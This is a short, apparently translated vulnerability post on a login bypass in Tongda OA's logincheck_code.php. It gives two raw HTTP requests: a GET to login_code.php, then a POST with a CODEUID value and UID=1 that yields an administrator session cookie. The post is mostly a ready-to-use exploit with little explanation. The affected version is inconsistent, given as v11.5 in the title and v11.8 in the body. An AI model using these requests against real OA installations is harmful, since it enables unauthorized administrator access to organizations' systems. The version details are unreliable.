Tongda Oa V11 5 Logincheck_code Php Login Bypass Vulnerability
Tongda Oa V11 5 Logincheck_code Php Login Bypass Vulnerability
Tongda OA v11.5 logincheck_code.php login bypass vulnerability
Vulnerability Description
Tongda OA v11.8 logincheck_code.php has a login bypass vulnerability, and an attacker can log in to the system administrator background through the vulnerability.
Vulnerability Impact
Tongda OA v11.8
Network surveying and mapping
Vulnerability reappears
Login page
Send the first request packet
1
2
3
4
GET /general/login_code.php HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Send a second malicious request
1
2
3
4
5
6
7
8
POST /logincheck_code.php HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
CODEUID=%7BD384F12E-A758-F44F-8A37-20E2568306A7%7D&UID=1
After obtaining cookies, visit the administrator page /general/index.php
This post is licensed under CC BY 4.0 by the author.